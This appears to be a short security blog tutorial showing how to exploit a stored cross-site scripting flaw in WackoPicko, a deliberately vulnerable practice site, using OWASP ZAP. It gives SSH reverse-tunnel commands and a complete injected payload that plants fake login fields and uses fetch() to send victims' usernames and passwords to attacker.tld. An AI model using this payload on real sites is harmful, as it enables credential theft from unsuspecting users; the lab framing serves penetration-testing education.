Exploiting Cross-Site Scripting to Capture Passwords With OWASP ZAP

WackoPicko is a website that includes common vulnerabilities, including a stored XSS vulnerability in its blog comment feature. This vulnerability can be exploited to retrieve a victim’s username and password and subsequently gain access to their account by utilising OWASP ZAP.

e8bba8fb1f1846b61738e8c2bca29515.png

  • Access your remote C2 server via SSH and modify /etc/ssh/sshd_config so the following are enabled:
AllowTcpForwarding yes
GatewayPorts yes
  • Restart sshd with systemd:
sudo systemctl restart ssh
  • From your attacking machine, create a tunnel via SSH from the remote server so that anything that hits port 38193 will be redirected to the attacker’s instance of ZAP
ssh -N -R 38193:localhost:38193 user@attacker.tld
  • Going back to ZAP, open the Options menu and go to the go to “Callback Address” entering the following:

c0189e9bd3e534db36df492376038540.png

  • Go back to the Guestbook and submit the following payload in a blog comment, inserting your Test URL:
<input name=username id=username>
<input type=password name=password onchange="if(this.value.length)fetch('http://attacker.tld:38193/ZapTest',{
method:'POST',
mode: 'no-cors',
body:username.value+':'+this.value
});">
  • This script will make anyone who views the comment issue a POST request to http://attacker.tld:38193/ZapTest containing their username and password.
  • Go back to the Callbacks tab (which you may need to add)
  • Take a note of the value of the victim’s username and password in the POST body.

491e3b93af3f65d31ff2d53597aba78f.png

Chaotic Solutions

A blog about things that can be used, by people.


In this brief piece, you'll learn about using OWASP ZAP to obtain passwords through XSS.

By Anthony Cozamanis, 2023-05-13